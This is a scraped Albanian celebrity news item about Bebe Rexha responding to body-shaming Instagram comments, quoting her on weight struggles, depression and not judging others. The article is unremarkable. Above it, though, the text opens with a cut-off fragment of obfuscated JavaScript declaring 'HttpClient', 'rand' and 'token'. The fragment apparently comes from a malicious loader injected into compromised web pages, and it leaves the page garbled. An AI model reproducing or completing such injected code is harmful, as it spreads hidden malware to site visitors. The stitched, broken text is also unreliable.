;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Bebe Rexha u’a tregon vendin të gjithë atyre që e quajtën të shëndoshë

By

Këngëtarja me prejardhje shqiptare postoi në Instagram një foto të sajën duke performuar në Kanë, Francë. Që atëherë postimin i saj ka marrë qindra mijëra pëlqime dhe komente.

Por që shumë nga ato komente ishin fokusuar rreth peshës trupore të Bebe Rexhës.

Bebe shpeshherë ka folur hapur për problemet e më hershme me imazhin e saj trupor dhe tani ajo pa ndalur bën thirrje për vajzat dhe meshkujt që të duan trupin e tyre ashtu siç është.

Njëri koment në veçanti që e lëndoi këngëtaren ishte “ Po shëndoshesh shumë, trashaluqe.”

Por komentet që ajo morri nuk kaluan nga një sy qorr, dhe ajo hyri në Instagram për të ndarë disa mendime me ndjekësit e saj. Ajo shkruan:

“Humbja e peshës është e vështirë. Më pëlqen të ha dhe nuk mund ta mohoj këtë. Por ju nuk i dini historitë e të gjithëve. Të shkuarën e njerëzve, varësitë e tyre, marrin apo jo ilaçe që i bëjnë të shtojnë në peshë. Depresioni. Kështu unë përpiqem të mos i gjykoj të tjerët. Por kjo më lëndon ndjenjat, sepse unë kam fituar shumë peshë, por është shumë e vështirë ta humbas. Pesha ka qenë diçka e vështirë për mua, që kur kam qenë vajzë e vogël. Po është një rrugë e gjatë dhe unë nuk do të fshihem pas një guri sepse kam fituar peshë. Unë do të stërvitem dhe do të kem ditë të mira dhe ditë të këqija”, ka përfunduar këngëtarja. /Prive.al

Artikuj të ngjashëm